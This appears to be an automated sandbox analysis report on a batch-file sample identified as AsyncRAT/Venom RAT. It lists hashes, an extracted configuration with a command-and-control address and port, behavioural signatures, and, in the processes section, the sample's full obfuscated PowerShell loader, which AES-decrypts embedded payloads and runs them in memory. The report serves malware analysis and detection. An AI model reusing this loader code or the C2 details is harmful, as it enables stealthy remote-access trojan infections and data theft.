Analysis
-
max time kernel
145s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
17-04-2024 01:08
Static task
static1
Behavioral task
behavioral1
Sample
40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat
Resource
win7-20240221-en
General
-
Target
40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat
-
Size
61KB
-
MD5
28de2826893ab7e1f2c97521e8fb8ef7
-
SHA1
50a03746f808599f6ea91b176bc1621c21911eeb
-
SHA256
40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1
-
SHA512
28f6268cb2944b2d9c76d35d0df6e23e02242bbf5d0a1556b585321a166bd3694cc2e78347d98df4ba1502d397654243ccce10b0935c92076fe12c67f688c451
-
SSDEEP
1536:NkwiNwg9/Sdqu+PZuFehHoCWryzg8jLVJTMdqEpo/LBfG:PiNw60+PZu+ICSXGxJTE8VfG
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
193.222.96.41:4449
nkvohxapain
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/3232-33-0x00000203A9380000-0x00000203A9398000-memory.dmp family_asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 26 3232 powershell.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 3232 powershell.exe 3232 powershell.exe 4068 powershell.exe 4068 powershell.exe 3232 powershell.exe 3232 powershell.exe 3232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3232 powershell.exe Token: SeDebugPrivilege 4068 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3232 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1828 wrote to memory of 3320 1828 cmd.exe 84 PID 1828 wrote to memory of 3320 1828 cmd.exe 84 PID 3320 wrote to memory of 4852 3320 cmd.exe 87 PID 3320 wrote to memory of 4852 3320 cmd.exe 87 PID 3320 wrote to memory of 3232 3320 cmd.exe 88 PID 3320 wrote to memory of 3232 3320 cmd.exe 88 PID 3232 wrote to memory of 4068 3232 powershell.exe 92 PID 3232 wrote to memory of 4068 3232 powershell.exe 92
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat';$ZFXl='SpUNVvliUNVvtUNVv'.Replace('UNVv', ''),'GeIQUWtCIQUWurIQUWrIQUWenIQUWtPrIQUWoceIQUWssIQUW'.Replace('IQUW', ''),'MaaWJUinMaWJUoaWJUdaWJUuaWJUleaWJU'.Replace('aWJU', ''),'CLsXAreaLsXAteDLsXAeLsXAcLsXAryLsXAptLsXAoLsXArLsXA'.Replace('LsXA', ''),'CJHTlhanJHTlgeEJHTlxJHTltJHTlensJHTliJHTlonJHTl'.Replace('JHTl', ''),'EOAqclOAqcemeOAqcntOAqcAtOAqc'.Replace('OAqc', ''),'IYYGanvYYGaokYYGaeYYGa'.Replace('YYGa', ''),'DJEwBeJEwBcJEwBomJEwBprJEwBesJEwBsJEwB'.Replace('JEwB', ''),'LoFiVZaFiVZdFiVZ'.Replace('FiVZ', ''),'EnfjTctfjTcrfjTcyPfjTcofjTcinfjTctfjTc'.Replace('fjTc', ''),'TroNkUanoNkUsfoNkUooNkUrmFoNkUinoNkUalBoNkUlooNkUckoNkU'.Replace('oNkU', ''),'RPrvjePrvjaPrvjdLiPrvjnePrvjsPrvj'.Replace('Prvj', ''),'FPluNrPluNomBPluNasPluNe6PluN4PluNStPluNrPluNinPluNgPluN'.Replace('PluN', ''),'CfvCYopfvCYyfvCYTofvCY'.Replace('fvCY', '');powershell -w hidden;function DnPdg($NpRVN){$PsFdV=[System.Security.Cryptography.Aes]::Create();$PsFdV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsFdV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsFdV.Key=[System.Convert]::($ZFXl[12])('XN3NfgiFnJwaec6stVIzE/BuRsj55jkY+1Zsiukr1l4=');$PsFdV.IV=[System.Convert]::($ZFXl[12])('c4L4meGWtdx5xW7a8N8/JA==');$PQhBD=$PsFdV.($ZFXl[3])();$tJweH=$PQhBD.($ZFXl[10])($NpRVN,0,$NpRVN.Length);$PQhBD.Dispose();$PsFdV.Dispose();$tJweH;}function gsaQk($NpRVN){$XgXaM=New-Object System.IO.MemoryStream(,$NpRVN);$xWVjE=New-Object System.IO.MemoryStream;$klffI=New-Object System.IO.Compression.GZipStream($XgXaM,[IO.Compression.CompressionMode]::($ZFXl[7]));$klffI.($ZFXl[13])($xWVjE);$klffI.Dispose();$XgXaM.Dispose();$xWVjE.Dispose();$xWVjE.ToArray();}$FZeYR=[System.IO.File]::($ZFXl[11])([Console]::Title);$mGUkZ=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 5).Substring(2))));$froPR=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 6).Substring(2))));[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$froPR).($ZFXl[9]).($ZFXl[6])($null,$null);[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$mGUkZ).($ZFXl[9]).($ZFXl[6])($null,$null); "3⤵PID:4852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82